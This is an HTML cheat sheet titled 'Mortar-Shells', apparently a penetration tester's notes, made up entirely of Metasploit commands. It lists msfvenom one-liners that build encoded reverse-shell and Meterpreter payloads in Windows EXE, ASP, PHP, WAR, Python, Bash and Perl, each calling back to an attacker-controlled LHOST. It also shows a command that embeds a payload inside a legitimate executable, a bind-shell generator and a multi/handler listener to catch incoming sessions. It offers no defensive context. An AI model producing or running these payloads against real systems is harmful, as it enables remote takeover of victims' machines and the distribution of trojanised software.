<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Mortar-Shells</title>
</head><body>buffer overflow<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.34.31 LPORT=443 -f c -a x86 --platform windows -b "\x00\x20\x0a\x0d" -e x86/shikata_ga_nai -k<br/>
<br/>
----------<br/>
<br/>
Python<br/>
<br/>
msfvenom -p cmd/unix/reverse_python LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f raw &gt; shell.py<br/>
----------<br/>
<br/>
Bash<br/>
<br/>
msfvenom -p cmd/unix/reverse_bash LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f raw &gt; shell.sh<br/>
<br/>
----------<br/>
<br/>
Perl<br/>
<br/>
msfvenom -p cmd/unix/reverse_perl LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -b "\x00" -e x86/shikata_ga_nai -f raw &gt; shell.pl<br/>
<br/>
----------<br/>
<br/>
Windows ASP<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.220 LPORT=443 -f asp -e x86/shikata_ga_nai -i 10 &nbsp;&gt; Desktop/shell.asp <br/>
<br/>
----------<br/>
<br/>
Windows Executable<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.53 LPORT=443 -f exe -e x86/shikata_ga_nai -i 10 &gt; /Desktop/shell.exe<br/>
<br/>
----------<br/>
<br/>
WAR - IE Tomcat shell <br/>
<br/>
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=4444 -f war &gt; shell.war<br/>
<br/>
----------<br/>
<br/>
Generic shell<br/>
<br/>
msfvenom -p windows/shell_reverse_tcp -f js_le -e generic/none -a x86 --platform windows -s 342 LHOST=10.11.0.220 LPORT=443<br/>
<br/>
<br/>
----------<br/>
<br/>
PHP<br/>
<br/>
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=443 -f raw -e x86/shikata_ga_nai -i 3 &gt; shell.php<br/>
<br/>
----------<br/>
<br/>
Embed the code in an executable<br/>
<br/>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=4460 -f exe -e x86/shikata_ga_nai -i 10 -k -x original-file.exe &gt; new-file-with-malicious-code.exe<br/>
<br/>
"""""""<br/>
use this within msfconsole<br/>
<br/>
use payload/windows/meterpreter/bind_tcp<br/>
set LPORT 2444<br/>
generate -t exe -f /var/www/html/msf_bind2444.exe<br/>
<br/>
"""""""<br/>
<br/>
<br/>
<br/>
Handlers<br/>
<br/>
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.<br/>
<br/>
use exploit/multi/handler<br/>
set PAYLOAD &lt;Payload name&gt;<br/>
set LHOST &lt;LHOST value&gt;<br/>
set LPORT &lt;LPORT value&gt;<br/>
set ExitOnSession false<br/>
exploit -j -z</body></html>